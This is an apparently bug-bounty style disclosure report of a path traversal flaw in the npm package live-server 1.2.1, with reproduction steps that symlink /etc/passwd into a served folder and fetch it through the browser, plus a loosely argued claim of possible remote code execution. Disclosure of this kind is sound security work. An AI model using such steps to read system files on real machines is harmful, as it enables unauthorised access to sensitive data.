live-server

vulnerability path traversal
severity 7.7
language javascript
registry npm

:book: Description

I would like to report path traversal vulnerability in live-server module It allows an attacker to read system files via path traversal vulnerability. This is a little development server with live reload capability.

Module

module name: live-server version: 1.2.1 npm page: https://www.npmjs.com/package/live-server

:recycle: Steps To Reproduce-:

1)Install the live-server module $ npm install -g live-server

2)Make a directory $ mkdir test

3)Go to 'test' directory $ cd test

4)create a symlink file ln -s /etc/passwd 'filename'

5)Run live-server module $ live-server

6)Request the file within browser http://localhost:3474/'filename'

:telescope: POC

https://imgur.com/a/rHGnsGK

💥 Impact

This could have enabled an attacker to view system files and leverage attacks like remote code execution and so on

✅ Checklist

  • [x] Created and populated the README.md and vulnerability.json files
  • [x] Provided the repository URL and any applicable permalinks
  • [x] Defined all the applicable weaknesses (CWEs)
  • [x] Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
  • [x] Checked that the vulnerability affects the latest version of the package released
  • [x] Checked that a fix does not currently exist that remediates this vulnerability
  • [x] Complied with all applicable laws